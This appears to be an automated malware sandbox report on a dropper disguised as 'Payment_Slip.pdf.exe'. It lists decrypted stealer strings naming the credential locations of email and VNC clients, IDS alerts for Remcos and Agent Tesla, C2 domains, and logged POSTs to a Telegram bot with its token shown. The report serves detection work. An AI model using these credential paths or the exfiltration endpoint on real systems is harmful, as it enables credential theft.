                              Source: 12.0.host.exe.240000.0.unpackString decryptor: </server_user_password>
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: FTPGetter
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: The Bat!
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: appdata
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \The Bat!
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Account.CFN
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Account.CFN
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Becky!
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: DataDir
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Folder.lst
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Mailbox.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Account
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PassWd
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Account
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SMTPServer
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Account
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: MailAddress
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Becky!
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Outlook
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Email
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IMAP Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: POP3 Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: HTTP Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SMTP Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Email
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Email
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Email
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IMAP Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: POP3 Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: HTTP Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SMTP Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Windows Mail App
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Email
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SchemaId
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pResourceElement
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pIdentityElement
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pPackageSid
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: pAuthenticatorElement
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: syncpassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: mailoutgoing
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: FoxMail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Executable
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: FoxmailPath
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Storage\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Storage\
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Accounts\Account.rec0
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Accounts\Account.rec0
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Account.stg
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Account.stg
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: POP3Host
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SMTPHost
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: IncomingServer
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Account
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: MailAddress
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: POP3Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Opera Mail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: opera:
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PocoMail
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: appdata
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Pocomail\accounts.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Email
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: POPPass
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SMTPPass
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SMTP
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: eM Client
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: eM Client\accounts.dat
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: eM Client
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Accounts
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: "Username":"
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: "Secret":"
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: "ProviderName":"
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: o6806642kbM7c5
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Mailbird
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SenderIdentities
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Accounts
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \Mailbird\Store\Store.db
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Server_Host
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Accounts
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Email
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Username
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: EncryptedPassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Mailbird
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: RealVNC 4.x
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: RealVNC 3.x
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: RealVNC 4.x
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: RealVNC 3.x
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\ORL\WinVNC3
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: TightVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\TightVNC\Server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: TightVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\TightVNC\Server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: PasswordViewOnly
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: TightVNC ControlPassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\TightVNC\Server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ControlPassword
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: TigerVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Software\TigerVNC\Server
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: Password
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles(x86)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles(x86)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd2
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd2
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd2
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles(x86)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: UltraVNC
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: ProgramFiles(x86)
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: passwd2
                              Source: 12.0.host.exe.240000.0.unpackString decryptor: JDownloader 2.0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004315EC
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,14_2_00404423
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_004315EC
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_0cda5b99-4
                              Source: Payment_Slip.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2
                              Source: Payment_Slip.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041A01B
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040B28E
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040838E
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004087A0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00407848
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004068CD FindFirstFileW,FindNextFileW,11_2_004068CD
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0044BA59 FindFirstFileExA,11_2_0044BA59
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040AA71
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00417AAB
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040AC78
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407C87
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041A01B
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040B28E
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040838E
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004087A0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00407848
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004068CD FindFirstFileW,FindNextFileW,17_2_004068CD
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0044BA59 FindFirstFileExA,17_2_0044BA59
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040AA71
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00417AAB
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040AC78
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406D28
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 4x nop then jmp 09617E79h0_2_0961865C
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 4x nop then jmp 076D7009h7_2_076D77EC

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49720 -> 103.186.117.228:9373
                              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49724 -> 103.186.117.228:9373
                              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49722 -> 103.186.117.228:9373
                              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49725 -> 103.186.117.228:9373
                              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49721 -> 103.186.117.228:9373
                              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49723 -> 103.186.117.228:9373
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49764 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49755 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49735 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49743 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49771 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49753 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49744 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49757 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49761 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49749 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49733 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49743 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49743 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49735 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49754 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49733 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49733 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49762 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49755 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49764 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49762 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49762 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49757 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49771 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49744 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49767 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49749 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49761 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49759 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49765 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49754 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49769 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49767 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49765 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49759 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49753 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49753 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49769 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49763 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49763 -> 149.154.167.220:443
                              Source: Malware configuration extractorURLs: ratianaana701.bounceme.net
                              Source: Malware configuration extractorURLs: milala.duckdns.org
                              Source: unknownDNS query: name: api.telegram.org
                              Source: global trafficTCP traffic: 192.168.2.4:49720 -> 103.186.117.228:9373
                              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
                              Source: global trafficTCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63d5b8d96e57Host: api.telegram.orgContent-Length: 7553Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d00704e1Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63d890031cdeHost: api.telegram.orgContent-Length: 7553Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d9acfd77Host: api.telegram.orgContent-Length: 7553Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fe1c3fdf431Host: api.telegram.orgContent-Length: 930Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fe75b7b2864Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd750e94b613a4Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
